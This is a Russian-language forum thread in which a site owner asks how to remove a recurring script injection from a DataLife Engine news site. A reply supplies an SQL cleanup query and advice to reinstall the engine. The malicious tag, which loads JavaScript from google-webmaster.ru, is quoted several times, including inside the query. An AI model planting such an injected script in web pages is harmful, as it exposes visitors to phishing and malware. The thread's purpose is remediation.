вопрос
Всем привет! Сайт d3ver.kz
Прошу помощи или совета! Сталкиваюсь с таким впервые, я самоучка, но достиг многого!
Сайт подвергся заражению фишинговыми ссылками, при открытии ругается KIS, при просмотре исходного кода обнаружил, что вредоносный код цепляется только к коротким и полным новостям, после каждой новости добавляется код
Первое что я сделал это начал поиск этой ссылки в папке с движком, с помощью проги notepad++, поиск не удался.
Залез в базу SQL, там в строке с новостями в каждой теме была добавлена это ссылка, я отредактировал новости, НО ссылки появились на след. день снова.
Кто сталкивался с такими ссылками??? Посоветуйте, где копать, что искать, как найти или выкурить её можно из сайта!
Прошу помощи или совета! Сталкиваюсь с таким впервые, я самоучка, но достиг многого!
Сайт подвергся заражению фишинговыми ссылками, при открытии ругается KIS, при просмотре исходного кода обнаружил, что вредоносный код цепляется только к коротким и полным новостям, после каждой новости добавляется код
<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>
Первое что я сделал это начал поиск этой ссылки в папке с движком, с помощью проги notepad++, поиск не удался.
Залез в базу SQL, там в строке с новостями в каждой теме была добавлена это ссылка, я отредактировал новости, НО ссылки появились на след. день снова.
Кто сталкивался с такими ссылками??? Посоветуйте, где копать, что искать, как найти или выкурить её можно из сайта!
Сам столкнулся недавно с этой гадостью. Вот запрос, который нужно сделать по базе данных:
Это удалит скрипт со всех новостей как краткой, так и полной новости. Но это поможет в том случае, если скрипт везде один и тот же. Если там будет хоть цифра или буква в нем разные - тогда лучше откатить бд, иначе таких запросов кучу нужно сделать на каждый скрипт.
У меня именно этот удалился, но вместе с ним по базе был рассеян еще один, начинающийся с
Кстати, обновление движка не помогло, вирус залился на следующий день по новой. Пришлось вообще снести все файлы движка, установить с нуля и поставил AntiShell. Пока 5 дней - полет нормальный.
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>', ''),
`full_story`=REPLACE(full_story, '<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>', '')
WHERE
`short_story` LIKE '%<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>%'
OR
`full_story` LIKE '%<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>%'
Это удалит скрипт со всех новостей как краткой, так и полной новости. Но это поможет в том случае, если скрипт везде один и тот же. Если там будет хоть цифра или буква в нем разные - тогда лучше откатить бд, иначе таких запросов кучу нужно сделать на каждый скрипт.
У меня именно этот удалился, но вместе с ним по базе был рассеян еще один, начинающийся с
<object... Вот этот был в разных вариациях, так что пришлось делать откат бд.
Кстати, обновление движка не помогло, вирус залился на следующий день по новой. Пришлось вообще снести все файлы движка, установить с нуля и поставил AntiShell. Пока 5 дней - полет нормальный.